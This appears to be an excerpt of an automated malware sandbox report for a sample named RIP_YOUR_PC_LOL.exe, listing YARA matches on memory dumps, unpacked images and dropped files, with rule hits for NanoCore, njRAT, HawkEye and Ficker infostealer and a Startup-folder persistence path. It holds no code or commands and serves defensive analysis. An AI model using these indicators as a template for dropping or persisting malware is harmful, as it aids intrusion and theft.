                    Source: Yara match; File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara match; File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED

                    Operating System Destruction

                    Source: C:\Users\user\AppData\Roaming\mediaget.exe; Process information set: 01 00 00 00

                    System Summary

                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.5f65b6.17.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 11.0.22.exe.5f65b6.23.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.530edf.22.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.400000.12.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.5f65b6.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE; Matched rule: Detetcs the Nanocore RAT; Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE; Matched rule: Detects NanoCore; Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE; Matched rule: NanoCore; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPE; Matched rule: Detects Ficker infostealer; Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.43de6f.19.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 11.0.22.exe.530edf.16.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE; Matched rule: Identify njRat; Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.43de6f.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables using BlackMoon RunTime; Author: ditekSHen
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects file containing reversed ASEP Autorun registry keys; Author: ditekSHen
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects NjRAT / Bladabindi; Author: ditekSHen
